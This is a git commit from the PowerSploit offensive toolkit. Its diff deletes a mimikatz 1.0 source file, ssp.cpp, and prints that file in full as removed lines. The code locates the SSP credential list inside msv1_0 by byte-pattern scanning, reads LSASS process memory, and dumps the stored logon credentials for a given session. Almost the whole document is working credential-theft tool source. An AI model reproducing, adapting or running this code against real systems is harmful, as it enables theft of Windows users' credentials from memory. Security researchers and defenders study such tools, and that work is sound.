Merge branch 'master' of https://github.com/mattifestation/PowerSploit

Conflicts:
	Recon/Get-ComputerDetails.ps1
	Recon/Recon.psd1

1 files changed, 0 insertions, 92 deletions

diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/ssp.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/ssp.cpp
deleted file mode 100644
index 86dab86..0000000
--- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/ssp.cpp
+++ /dev/null
@@ -1,92 +0,0 @@
-/*	Benjamin DELPY `gentilkiwi`
-	http://blog.gentilkiwi.com
-	benjamin@gentilkiwi.com
-	Licence    : http://creativecommons.org/licenses/by/3.0/fr/
-	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#include "ssp.h"
-#include "..\..\global.h"
-mod_process::PKIWI_VERY_BASIC_MODULEENTRY mod_mimikatz_sekurlsa_ssp::pModMSV = NULL;
-mod_mimikatz_sekurlsa_ssp::PKIWI_SSP_CREDENTIAL_LIST_ENTRY mod_mimikatz_sekurlsa_ssp::SspCredentialList = NULL;
-
-bool mod_mimikatz_sekurlsa_ssp::getSSP(vector<wstring> * arguments)
-{
-	vector<pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>> monProvider;
-	monProvider.push_back(make_pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>(getSSPLogonData, wstring(L"ssp")));
-	return mod_mimikatz_sekurlsa::getLogonData(arguments, &monProvider);
-}
-
-bool mod_mimikatz_sekurlsa_ssp::searchSSPEntryList()
-{
-#ifdef _M_X64
-	BYTE PTRN_WIN5_SspCredentialList[]= {0xc7, 0x43, 0x24, 0x43, 0x72, 0x64, 0x41, 0xff, 0x15};
-	LONG OFFS_WIN5_SspCredentialList = sizeof(PTRN_WIN5_SspCredentialList) + 4 + 3;
-	BYTE PTRN_WIN6_SspCredentialList[]= {0xc7, 0x47, 0x24, 0x43, 0x72, 0x64, 0x41, 0x48, 0x89, 0x47, 0x78, 0xff, 0x15};
-	LONG OFFS_WIN6_SspCredentialList = sizeof(PTRN_WIN6_SspCredentialList) + 4 + 3;
-#elif defined _M_IX86
-	BYTE PTRN_WALL_SspCredentialList[]= {0x1c, 0x43, 0x72, 0x64, 0x41, 0xff, 0x15};
-	LONG OFFS_WALL_SspCredentialList = sizeof(PTRN_WALL_SspCredentialList) + 4 + 1;
-#endif
-
-	if(mod_mimikatz_sekurlsa::searchLSASSDatas() && pModMSV && !SspCredentialList)
-	{
-		PBYTE *pointeur = NULL; PBYTE pattern = NULL; ULONG taille = 0; LONG offset = 0;
-		pointeur= reinterpret_cast<PBYTE *>(&SspCredentialList);
-
-#ifdef _M_X64
-		if(mod_system::GLOB_Version.dwMajorVersion < 6)
-		{
-			pattern = PTRN_WIN5_SspCredentialList;
-			taille = sizeof(PTRN_WIN5_SspCredentialList);
-			offset = OFFS_WIN5_SspCredentialList;
-		}
-		else
-		{
-			pattern = PTRN_WIN6_SspCredentialList;
-			taille = sizeof(PTRN_WIN6_SspCredentialList);
-			offset = OFFS_WIN6_SspCredentialList;
-		}
-#elif defined _M_IX86
-		pattern = PTRN_WALL_SspCredentialList;
-		taille = sizeof(PTRN_WALL_SspCredentialList);
-		offset = OFFS_WALL_SspCredentialList;
-#endif
-		if(HMODULE monModule = LoadLibrary(L"msv1_0"))
-		{
-			MODULEINFO mesInfos;
-			if(GetModuleInformation(GetCurrentProcess(), monModule, &mesInfos, sizeof(MODULEINFO)))
-			{
-				mod_memory::genericPatternSearch(pointeur, L"msv1_0", pattern, taille, offset);
-				*pointeur += pModMSV->modBaseAddr - reinterpret_cast<PBYTE>(mesInfos.lpBaseOfDll);
-			}
-			FreeLibrary(monModule);
-		}
-	}
-	return (SspCredentialList != NULL);
-}
-
-bool WINAPI mod_mimikatz_sekurlsa_ssp::getSSPLogonData(__in PLUID logId, __in bool justSecurity)
-{
-	if(searchSSPEntryList())
-	{
-		KIWI_SSP_CREDENTIAL_LIST_ENTRY mesCredentials;
-		DWORD monNb = 0;
-		if(mod_memory::readMemory(SspCredentialList, &mesCredentials, sizeof(LIST_ENTRY), mod_mimikatz_sekurlsa::hLSASS))
-		{
-			while(mesCredentials.Flink != SspCredentialList)
-			{
-				if(mod_memory::readMemory(mesCredentials.Flink, &mesCredentials, sizeof(KIWI_SSP_CREDENTIAL_LIST_ENTRY), mod_mimikatz_sekurlsa::hLSASS))
-				{
-					if(RtlEqualLuid(logId, &(mesCredentials.LogonId)))
-					{
-						mod_mimikatz_sekurlsa::genericCredsToStream(&mesCredentials.credentials, justSecurity, true, &monNb);
-						monNb++;
-					}
-				}
-			}
-		}
-	}
-	else (*outputStream) << L"n.a. (SSP KO)";
-
-	return true;
-}
\ No newline at end of file